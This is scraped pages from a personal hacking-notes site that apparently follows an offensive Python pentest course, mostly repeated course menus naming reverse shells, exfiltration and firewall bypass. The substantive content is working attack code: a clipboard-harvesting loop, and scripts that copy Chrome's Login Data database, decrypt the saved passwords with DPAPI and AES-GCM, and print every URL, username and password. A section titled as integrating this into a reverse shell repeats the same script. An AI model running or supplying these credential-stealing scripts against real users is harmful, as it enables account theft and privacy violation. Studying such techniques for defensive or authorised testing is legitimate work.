* [Hickjack the Internet Explorer process to bypass an host-based firewall](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/)
.
* [Bypassing Next Generation Firewalls](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/)
.
* [Bypassing IPS with handmade XOR Encryption](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/)
.
* Malware and crytography:
* [TCP reverse shell with AES encryption](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/)
.
* [TCP reverse shell with RSA encryption](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/)
.
* [TCP reverse shell with hybrid encryption AES + RSA](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/)
.
* Password Hickjacking:
* [Simple keylogger in python](https://amandaguglieri.github.io/hackinglife/python/python-keylogger/)
.
* [Hijacking Keepass Password Manager](https://amandaguglieri.github.io/hackinglife/python/hijacking-keepass/)
.
* [Dumping saved passwords from Google Chrome](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/)
.
* [Man in the browser attack](https://amandaguglieri.github.io/hackinglife/python/man-in-the-browser-attack/)
.
* [DNS Poisoning](https://amandaguglieri.github.io/hackinglife/python/dns-poisoning/)
.
* Privilege escalation:
* [Weak service file permission](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/)
.
| | |
| --- | --- |
| [1](https://amandaguglieri.github.io/hackinglife/python/hijacking-keepass/#__codelineno-0-1)
[2](https://amandaguglieri.github.io/hackinglife/python/hijacking-keepass/#__codelineno-0-2)
[3](https://amandaguglieri.github.io/hackinglife/python/hijacking-keepass/#__codelineno-0-3)
[4](https://amandaguglieri.github.io/hackinglife/python/hijacking-keepass/#__codelineno-0-4)
[5](https://amandaguglieri.github.io/hackinglife/python/hijacking-keepass/#__codelineno-0-5)
[6](https://amandaguglieri.github.io/hackinglife/python/hijacking-keepass/#__codelineno-0-6)
[7](https://amandaguglieri.github.io/hackinglife/python/hijacking-keepass/#__codelineno-0-7)
[8](https://amandaguglieri.github.io/hackinglife/python/hijacking-keepass/#__codelineno-0-8)
[9](https://amandaguglieri.github.io/hackinglife/python/hijacking-keepass/#__codelineno-0-9)
[10](https://amandaguglieri.github.io/hackinglife/python/hijacking-keepass/#__codelineno-0-10)
[11](https://amandaguglieri.github.io/hackinglife/python/hijacking-keepass/#__codelineno-0-11)
[12](https://amandaguglieri.github.io/hackinglife/python/hijacking-keepass/#__codelineno-0-12)
[13](https://amandaguglieri.github.io/hackinglife/python/hijacking-keepass/#__codelineno-0-13)
[14](https://amandaguglieri.github.io/hackinglife/python/hijacking-keepass/#__codelineno-0-14)
[15](https://amandaguglieri.github.io/hackinglife/python/hijacking-keepass/#__codelineno-0-15)
[16](https://amandaguglieri.github.io/hackinglife/python/hijacking-keepass/#__codelineno-0-16)
[17](https://amandaguglieri.github.io/hackinglife/python/hijacking-keepass/#__codelineno-0-17)
[18](https://amandaguglieri.github.io/hackinglife/python/hijacking-keepass/#__codelineno-0-18)
[19](https://amandaguglieri.github.io/hackinglife/python/hijacking-keepass/#__codelineno-0-19)
[20](https://amandaguglieri.github.io/hackinglife/python/hijacking-keepass/#__codelineno-0-20)
[21](https://amandaguglieri.github.io/hackinglife/python/hijacking-keepass/#__codelineno-0-21)
[22](https://amandaguglieri.github.io/hackinglife/python/hijacking-keepass/#__codelineno-0-22)
[23](https://amandaguglieri.github.io/hackinglife/python/hijacking-keepass/#__codelineno-0-23)
[24](https://amandaguglieri.github.io/hackinglife/python/hijacking-keepass/#__codelineno-0-24)
[25](https://amandaguglieri.github.io/hackinglife/python/hijacking-keepass/#__codelineno-0-25) | `# Python For Offensive PenTest: A Complete Practical Course- All rights reserved # Follow me on LinkedIn https://jo.linkedin.com/in/python2 #pip install pyperclip import pyperclip import time list = [] # we create a list which will store the clipboard content while True: # infifnite loop to continously check the clipboard if pyperclip.paste() != 'None': # if the clipboard content is not empty ... value = pyperclip.paste() # then we will take its value and put it into variable called value #now to make sure that we don't get replicated items in our list before appending the value varaible into our list, we gonna check if the value is stored eariler in the first place, if not then this menas this is a new item and we will append it to our list if value not in list: list.append(value) print(list) time.sleep(3)` |
Last update: 2024-03-29
Created: April 20, 2023 16:58:49
Back to top
---
# Dumping saved passwords from Google Chrome - Hacking Life
[Skip to content](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#dumping-saved-passwords-from-google-chrome)
Dumping saved passwords from Google Chrome
==========================================
From course: [Python For Offensive PenTest: A Complete Practical Course](https://www.udemy.com/course/python-for-offensive-security-practical-course/)
.
General index of the course
* Gaining persistence shells (TCP + HTTP):
* [Coding a TCP connection and a reverse shell](https://amandaguglieri.github.io/hackinglife/python/coding-a-tcp-reverse-shell/)
.
* [Coding a low level data exfiltration - TCP connection](https://amandaguglieri.github.io/hackinglife/python/coding-a-low-level-data-exfiltration-tcp/)
.
* [Coding an http reverse shell](https://amandaguglieri.github.io/hackinglife/python/coding-an-http-reverse-shell/)
.
* [Coding a data exfiltration script for a http shell](https://amandaguglieri.github.io/hackinglife/python/coding-a-data-exfiltration-script-http-shell/)
.
* [Tunning the connection attempts](https://amandaguglieri.github.io/hackinglife/python/tunning-the-connection-attemps/)
.
* [Including cd command into TCP reverse shell](https://amandaguglieri.github.io/hackinglife/python/including-cd-command-into-tcp-reverse-shell/)
.
* Advanced scriptable shells:
* [Using a Dynamic DNS instead of your bared attacker public ip](https://amandaguglieri.github.io/hackinglife/python/ddns-aware-shell/)
.
* [Making your binary persistent](https://amandaguglieri.github.io/hackinglife/python/making-your-binary-persistent/)
.
* [Making a screenshot](https://amandaguglieri.github.io/hackinglife/python/making-a-screenshot/)
.
* [Coding a reverse shell that searches files](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/)
.
* Techniques for bypassing filters:
* [Coding a reverse shell that scans ports](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/)
.
* [Hickjack the Internet Explorer process to bypass an host-based firewall](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/)
.
* [Bypassing Next Generation Firewalls](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/)
.
* [Bypassing IPS with handmade XOR Encryption](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/)
.
* Malware and crytography:
* [TCP reverse shell with AES encryption](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/)
.
* [TCP reverse shell with RSA encryption](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/)
.
* [TCP reverse shell with hybrid encryption AES + RSA](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/)
.
* Password Hickjacking:
* [Simple keylogger in python](https://amandaguglieri.github.io/hackinglife/python/python-keylogger/)
.
* [Hijacking Keepass Password Manager](https://amandaguglieri.github.io/hackinglife/python/hijacking-keepass/)
.
* [Dumping saved passwords from Google Chrome](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/)
.
* [Man in the browser attack](https://amandaguglieri.github.io/hackinglife/python/man-in-the-browser-attack/)
.
* [DNS Poisoning](https://amandaguglieri.github.io/hackinglife/python/dns-poisoning/)
.
* Privilege escalation:
* [Weak service file permission](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/)
.
How does Chrome saved passwords work?
-------------------------------------
Chrome uses windows session password to encrypt and decrypt saved passwords. Encrypted passwords are stored in a SQlite db called 'Login Data DB' located at:
| | |
| --- | --- |
| [1](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-0-1) | `C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default` |
Chrome calls to the windows API function called "CryptProtectData", which uses the windows login password as an encryption key and in reverse operation a windows API function called "CryptUnprotectData" to decrypt the password value back to clear text.
**1.** Install sqlite from: https://sqlitebrowser.org/dl/
**2.** Open DB Browser sqlite.
**3.** In your windows explorer, go to the path where sqlite db is stored and copy the file "Login Data" to your Desktop.
**4.** Change the extension of "Login Data" file to .sqlite3
**5.** Open "Login Data.sqlite3" in DB Browser sqlite.
**6.** Go to tab "Browse Data" (Hoja de Datos in spanish) and select the table login. There you have all stored passwords.
Our script
----------
The route map for this script will be:
**1.** Guessing the path to sqlite database: username and browser used by the victim.
| | |
| --- | --- |
| [1](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-1-1) | `C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default` |
**2.** Sending the password value from a column in "logins" table, in "Login Data.sqlite3" to function CryptUn ProtectData.
**3.** Send the passwords through a reverse shell.
### Script for gathering passwords
Here is the script provided in the course (it doesn't work, below I've pasted a different one that works):
| | |
| --- | --- |
| [1](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-2-1)
[2](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-2-2)
[3](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-2-3)
[4](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-2-4)
[5](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-2-5)
[6](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-2-6)
[7](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-2-7)
[8](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-2-8)
[9](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-2-9)
[10](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-2-10)
[11](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-2-11)
[12](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-2-12)
[13](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-2-13)
[14](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-2-14)
[15](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-2-15)
[16](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-2-16)
[17](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-2-17)
[18](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-2-18)
[19](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-2-19)
[20](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-2-20)
[21](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-2-21)
[22](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-2-22)
[23](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-2-23)
[24](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-2-24)
[25](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-2-25)
[26](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-2-26)
[27](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-2-27)
[28](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-2-28)
[29](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-2-29)
[30](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-2-30)
[31](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-2-31)
[32](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-2-32)
[33](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-2-33)
[34](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-2-34)
[35](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-2-35)
[36](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-2-36)
[37](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-2-37)
[38](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-2-38)
[39](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-2-39)
[40](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-2-40)
[41](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-2-41) | `# Python For Offensive PenTest: A Complete Practical Course - All rights reserved # Follow me on LinkedIn https://jo.linkedin.com/in/python2 from os import getenv # To find out the Chrome SQL path- C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Login Data import sqlite3 # To read the Chrome SQLite DB import win32crypt # High level library to call windows API CryptUnprotectData from shutil import copyfile # To make a copy of the Chrome SQLite DB # LOCALAPPDATA is a Windows Environment Variable which points to >>> C:\Users\{username}\AppData\Local path = getenv("LOCALAPPDATA")+r"\Google\Chrome\User Data\Default\Login Data" # make a copy the Login Data DB and pull data out of the copied DB, so there are no conflicts in case that the user is using the original (maybe she is logged into facebook, let's say) path2 = getenv("LOCALAPPDATA")+r"\Google\Chrome\User Data\Default\Login2" copyfile(path, path2) # Connect to the copied Database conn = sqlite3.connect(path2) cursor = conn.cursor() #Create a Cursor object and call its execute() method to perform SQL commands like SELECT # SELECT column_name,column_name FROM table_name # SELECT action_url and username_value and password_value FROM table logins cursor.execute('SELECT action_url, username_value, password_value FROM logins') # To retrieve data after executing a SELECT statement, we call fetchall() to get a list of the matching rows. for raw in cursor.fetchall(): print(raw[0] + '\n' + raw[1]) # print the action_url (raw[0]) and print the username_value (raw[1]) password = win32crypt.CryptUnprotectData(raw[2])[1] # pass the encrypted Password to CryptUnprotectData API function to decrypt it print(password) conn.close()` |
Script that works. These are requirements:
| | |
| --- | --- |
| [1](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-3-1) | `pip install PyCryptodome` |
Script:
| | |
| --- | --- |
| [1](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-1)
[2](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-2)
[3](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-3)
[4](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-4)
[5](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-5)
[6](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-6)
[7](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-7)
[8](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-8)
[9](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-9)
[10](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-10)
[11](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-11)
[12](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-12)
[13](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-13)
[14](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-14)
[15](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-15)
[16](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-16)
[17](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-17)
[18](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-18)
[19](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-19)
[20](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-20)
[21](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-21)
[22](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-22)
[23](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-23)
[24](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-24)
[25](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-25)
[26](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-26)
[27](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-27)
[28](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-28)
[29](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-29)
[30](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-30)
[31](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-31)
[32](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-32)
[33](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-33)
[34](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-34)
[35](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-35)
[36](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-36)
[37](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-37)
[38](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-38)
[39](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-39)
[40](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-40)
[41](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-41)
[42](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-42)
[43](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-43)
[44](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-44)
[45](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-45)
[46](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-46)
[47](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-47)
[48](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-48)
[49](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-49)
[50](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-50)
[51](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-51)
[52](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-52)
[53](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-53)
[54](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-54)
[55](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-55)
[56](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-56)
[57](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-57)
[58](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-58)
[59](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-4-59) | `import os import json import base64 import sqlite3 import win32crypt from Crypto.Cipher import AES import shutil def get_master_key(): with open(os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\Local State', "r") as f: local_state = f.read() local_state = json.loads(local_state) master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"]) master_key = master_key[5:] # removing DPAPI master_key = win32crypt.CryptUnprotectData(master_key, None, None, None, 0)[1] return master_key def decrypt_payload(cipher, payload): return cipher.decrypt(payload) def generate_cipher(aes_key, iv): return AES.new(aes_key, AES.MODE_GCM, iv) def decrypt_password(buff, master_key): try: iv = buff[3:15] payload = buff[15:] cipher = generate_cipher(master_key, iv) decrypted_pass = decrypt_payload(cipher, payload) decrypted_pass = decrypted_pass[:-16].decode() # remove suffix bytes return decrypted_pass except Exception as e: # print("Probably saved password from Chrome version older than v80\n") # print(str(e)) return "Chrome < 80" master_key = get_master_key() login_db = os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\default\Login Data' shutil.copy2(login_db, "Loginvault.db") #making a temp copy since Login Data DB is locked while Chrome is running conn = sqlite3.connect("Loginvault.db") cursor = conn.cursor() try: cursor.execute("SELECT action_url, username_value, password_value FROM logins") for r in cursor.fetchall(): url = r[0] username = r[1] encrypted_password = r[2] decrypted_password = decrypt_password(encrypted_password, master_key) if len(username) > 0: print("URL: " + url + "\nUser Name: " + username + "\nPassword: " + decrypted_password + "\n" + "*" * 50 + "\n") except Exception as e: pass cursor.close() conn.close() try: os.remove("Loginvault.db") except Exception as e: pass` |
### Script with gathering passwords phase integrated in a reverse shell
| | |
| --- | --- |
| [1](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-5-1)
[2](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-5-2)
[3](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-5-3)
[4](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-5-4)
[5](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-5-5)
[6](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-5-6)
[7](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-5-7)
[8](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-5-8)
[9](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-5-9)
[10](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-5-10)
[11](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-5-11)
[12](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-5-12)
[13](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-5-13)
[14](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-5-14)
[15](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-5-15)
[16](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-5-16)
[17](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-5-17)
[18](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-5-18)
[19](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-5-19)
[20](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-5-20)
[21](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-5-21)
[22](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-5-22)
[23](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-5-23)
[24](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-5-24)
[25](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-5-25)
[26](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-5-26)
[27](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-5-27)
[28](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-5-28)
[29](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-5-29)
[30](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-5-30)
[31](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-5-31)
[32](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-5-32)
[33](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-5-33)
[34](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-5-34)
[35](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-5-35)
[36](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-5-36)
[37](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-5-37)
[38](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-5-38)
[39](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-5-39)
[40](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-5-40)
[41](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-5-41)
[42](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/#__codelineno-5-42) | `# Python For Offensive PenTest: A Complete Practical Course - All rights reserved # Follow me on LinkedIn https://jo.linkedin.com/in/python2 import json import base64 from os import getenv # To find out the Chrome SQL path- C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Login Data import sqlite3 # To read the Chrome SQLite DB from Crypto.Cipher import AES import win32crypt # High level library to call windows API CryptUnprotectData from shutil import copyfile # To make a copy of the Chrome SQLite DB # LOCALAPPDATA is a Windows Environment Variable which points to >>> C:\Users\{username}\AppData\Local path = getenv("LOCALAPPDATA")+r"\Google\Chrome\User Data\Default\Login Data" # make a copy the Login Data DB and pull data out of the copied DB path2 = getenv("LOCALAPPDATA")+r"\Google\Chrome\User Data\Default\Login2" copyfile(path, path2) # Connect to the copied Database conn = sqlite3.connect(path2) cursor = conn.cursor() #Create a Cursor object and call its execute() method to perform SQL commands like SELECT # SELECT column_name,column_name FROM table_name # SELECT action_url and username_value and password_value FROM table logins cursor.execute('SELECT action_url, username_value, password_value FROM logins') # To retrieve data after executing a SELECT statement, we call fetchall() to get a list of the matching rows. for raw in cursor.fetchall(): print(raw[0] + '\n' + raw[1]) # print the action_url (raw[0]) and print the username_value (raw[1]) password = win32crypt.CryptUnprotectData(raw[2])[1] # pass the encrypted Password to CryptUnprotectData API function to decrypt it print(password) conn.close()` |
Last update: 2024-03-29
Created: April 20, 2023 16:58:49
Back to top
---
# Man in the browser attack - Hacking Life
[Skip to content](https://amandaguglieri.github.io/hackinglife/python/man-in-the-browser-attack/#man-in-the-browser-attack)
Man in the browser attack
=========================
From course: [Python For Offensive PenTest: A Complete Practical Course](https://www.udemy.com/course/python-for-offensive-security-practical-course/)
.
General index of the course
* Gaining persistence shells (TCP + HTTP):
* [Coding a TCP connection and a reverse shell](https://amandaguglieri.github.io/hackinglife/python/coding-a-tcp-reverse-shell/)
.
* [Coding a low level data exfiltration - TCP connection](https://amandaguglieri.github.io/hackinglife/python/coding-a-low-level-data-exfiltration-tcp/)
.
* [Coding an http reverse shell](https://amandaguglieri.github.io/hackinglife/python/coding-an-http-reverse-shell/)
.
* [Coding a data exfiltration script for a http shell](https://amandaguglieri.github.io/hackinglife/python/coding-a-data-exfiltration-script-http-shell/)
.
* [Tunning the connection attempts](https://amandaguglieri.github.io/hackinglife/python/tunning-the-connection-attemps/)
.
* [Including cd command into TCP reverse shell](https://amandaguglieri.github.io/hackinglife/python/including-cd-command-into-tcp-reverse-shell/)
.
* Advanced scriptable shells:
* [Using a Dynamic DNS instead of your bared attacker public ip](https://amandaguglieri.github.io/hackinglife/python/ddns-aware-shell/)
.
* [Making your binary persistent](https://amandaguglieri.github.io/hackinglife/python/making-your-binary-persistent/)
.
* [Making a screenshot](https://amandaguglieri.github.io/hackinglife/python/making-a-screenshot/)
.
* [Coding a reverse shell that searches files](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/)
.
